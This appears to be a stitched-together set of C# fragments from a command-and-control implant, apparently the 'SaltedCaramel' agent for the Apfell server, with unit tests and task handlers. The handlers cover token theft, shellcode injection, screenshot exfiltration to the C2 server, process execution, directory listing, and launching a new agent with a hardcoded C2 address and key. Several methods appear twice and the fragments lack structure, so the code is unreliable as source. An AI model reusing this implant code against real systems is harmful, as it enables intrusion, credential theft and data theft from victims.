public void TokenWinlogon()
{
SCTask task = new SCTask("steal_token", "", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
}
public void TaskChangeDirValid()
{
SCTask task = new SCTask("cd", "C:\\Temp", "1");
Tasks.ChangeDir.Execute(task);
Assert.AreEqual("complete", task.status);
}
public void TaskChangeDirInvalid()
{
SCTask task = new SCTask("cd", "C:\\asdf", "1");
Tasks.ChangeDir.Execute(task);
Assert.AreEqual("error", task.status);
}
public void TaskChangeDirValid()
{
SCTask task = new SCTask("cd", "C:\\Temp", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
}
public void Shellcode()
{
SCTask task = new SCTask("shinject", "", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
}
public void TaskChangeDirInvalid()
{
SCTask task = new SCTask("cd", "C:\\asdf", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "error");
}
// Same workflow as sending a file to Apfell server, but we only use one chunk
private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
{
try // Try block for HTTP request
{
// Send total number of chunks to Apfell server
// Number of chunks will always be one for screen capture task
// Receive file ID in response
SCTaskResp initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}");
DownloadReply reply = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);
// Convert chunk to base64 blob and create our FileChunk
FileChunk fc = new FileChunk();
fc.chunk_num = 1;
fc.file_id = reply.file_id;
fc.chunk_data = Convert.ToBase64String(screenshot);
// Send our FileChunk to Apfell server
// Receive status in response
SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
string postReply = implant.PostResponse(response);
Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");
// Tell the Apfell server file transfer is done
implant.SendComplete(task.id);
}
catch (Exception e) // Catch exceptions from HTTP requests
{
// Something failed, so we need to tell the server about it
task.status = "error";
task.message = e.Message;
}
}
public static void Execute(SCTask task, SCImplant implant)
{
if (task.command == "jobs")
{
task.status = "complete";
task.message = JsonConvert.SerializeObject(implant.jobs);
}
else if (task.command == "jobkill")
{
Thread t;
foreach (Job j in implant.jobs)
{
if (j.shortId == Convert.ToInt32(task.@params))
{
t = j.thread;
try
{
t.Abort();
task.status = "complete";
task.message = $"Killed job {j.shortId}";
}
catch (Exception e)
{
task.status = "error";
task.message = $"Error stopping job {j.shortId}: {e.Message}";
}
}
}
}
}
public void TokenInvalid()
{
SCTask task = new SCTask("steal_token", "12351", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "error");
}
public static void Execute(SCTask task, SCImplant implant)
{
string path = task.@params;
SharpSploitResultList <Host.FileSystemEntryResult> list;
try
{
if (path != "")
{
list = Host.GetDirectoryListing(path);
}
else
{
list = Host.GetDirectoryListing();
}
List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >();
foreach (Host.FileSystemEntryResult item in list)
{
FileInfo f = new FileInfo(item.Name);
Dictionary <string, string> infoDict = new Dictionary <string, string>();
try
{
infoDict.Add("size", f.Length.ToString());
infoDict.Add("type", "file");
infoDict.Add("name", f.Name);
fileList.Add(infoDict);
}
catch
{
infoDict.Add("size", "0");
infoDict.Add("type", "dir");
infoDict.Add("name", item.Name);
fileList.Add(infoDict);
}
}
SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fileList));
implant.PostResponse(response);
implant.SendComplete(task.id);
task.status = "complete";
task.message = fileList.ToString();
}
catch (DirectoryNotFoundException)
{
Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
implant.SendError(task.id, "Error: Directory not found.");
task.status = "error";
task.message = "Directory not found.";
}
catch (Exception e)
{
Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
implant.SendError(task.id, $"Error: {e.Message}");
task.status = "error";
task.message = e.Message;
}
}
public void PowerShellValid()
{
SCTask task = new SCTask("powershell", "Get-Process", "1");
Tasks.Powershell.Execute(task);
Assert.AreEqual("complete", task.status);
Assert.IsNotNull(task.message);
}
public void KillInvalid()
{
SCTask task = new SCTask("kill", "1234567", "1");
Tasks.Kill.Execute(task);
Assert.AreEqual("error", task.status);
Assert.IsNotNull(task.message);
}
public void DirectoryListInvalid()
{
SCTask task = new SCTask("ls", "C:\\asdf", "1");
Tasks.DirectoryList.Execute(task, implant);
Assert.AreEqual("error", task.status);
Assert.IsNotNull(task.message);
}
public void DirectoryListValid()
{
SCTask task = new SCTask("ls", "C:\\Temp", "1");
Tasks.DirectoryList.Execute(task, implant);
Assert.AreEqual("complete", task.status);
Assert.IsNotNull(task.message);
}
public void TokenInvalid()
{
SCTask task = new SCTask("steal_token", "12351", "1");
Tasks.Token.Execute(task);
Assert.AreEqual("error", task.status);
Tasks.Token.Revert();
}
public void TokenWinlogon()
{
SCTask task = new SCTask("steal_token", "", "1");
Tasks.Token.Execute(task);
Assert.AreEqual("complete", task.status);
Tasks.Token.Revert();
}
public static void Execute(SCTask task)
{
if (LoadShellcode())
{
task.status = "complete";
task.message = "Shellcode loaded.";
}
}
public void ProcInvalid()
{
SCTask task = new SCTask("run", "asdf", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "error");
Assert.IsNotNull(task.message);
}
public void PowerShellValid()
{
SCTask task = new SCTask("powershell", "Get-Process", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
Assert.IsNotNull(task.message);
}
public void ProcValid()
{
SCTask task = new SCTask("run", "whoami", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
Assert.IsNotNull(task.message);
}
public void KillInvalid()
{
SCTask task = new SCTask("kill", "1234567", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "error");
Assert.IsNotNull(task.message);
}
public void DirectoryListInvalid()
{
SCTask task = new SCTask("ls", "C:\\asdf", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "error");
Assert.IsNotNull(task.message);
}
public void DirectoryListValid()
{
SCTask task = new SCTask("ls", "C:\\Temp", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
Assert.IsNotNull(task.message);
}
public void ProcessList()
{
SCTask task = new SCTask("ps", "", "1");
Tasks.ProcessList.Execute(task);
Assert.AreEqual("complete", task.status);
Assert.IsNotNull(task.message);
Assert.IsTrue(task.message.Contains("explorer"));
}
public void ProcValid()
{
Tasks.Token.stolenHandle = IntPtr.Zero;
SCTask task = new SCTask("run", "whoami /priv", "1");
Tasks.Proc.Execute(task, implant);
Assert.AreEqual("complete", task.status);
Assert.IsNotNull(task.message);
}
public void ProcInvalid()
{
Tasks.Token.stolenHandle = IntPtr.Zero;
SCTask task = new SCTask("run", "asdf", "1");
Tasks.Proc.Execute(task, implant);
Assert.AreEqual("error", task.status);
Assert.IsNotNull(task.message);
}
public void ProcessList()
{
SCTask task = new SCTask("ps", "", "1");
task.DispatchTask(implant);
Assert.AreEqual(task.status, "complete");
Assert.IsNotNull(task.message);
Assert.IsTrue(task.message.Contains("explorer"));
}
public static void Execute(SCTask task)
{
//typeof(SaltedCaramel).Assembly.EntryPoint.Invoke(null,
// new[] { new string[] { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" } });
AppDomain domain = AppDomain.CreateDomain("asdfasdf");
Assembly target = domain.Load(typeof(SaltedCaramel).Assembly.FullName);
string[] args = { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" };
target.EntryPoint.Invoke(null, new[] { args });
}
// (username, (password, netonly))
public static void Execute(SCTask task)
{
if (task.command == "steal_token")
{
StealToken(task);
}
else if (task.command == "make_token")
{
MakeToken(task);
}
}
public static void Execute(SCTask task, SCImplant implant)
{
try
{
implant.SendComplete(task.id);
}
catch (Exception e)
{
implant.SendError(task.id, e.Message);
}
Environment.Exit(0);
}
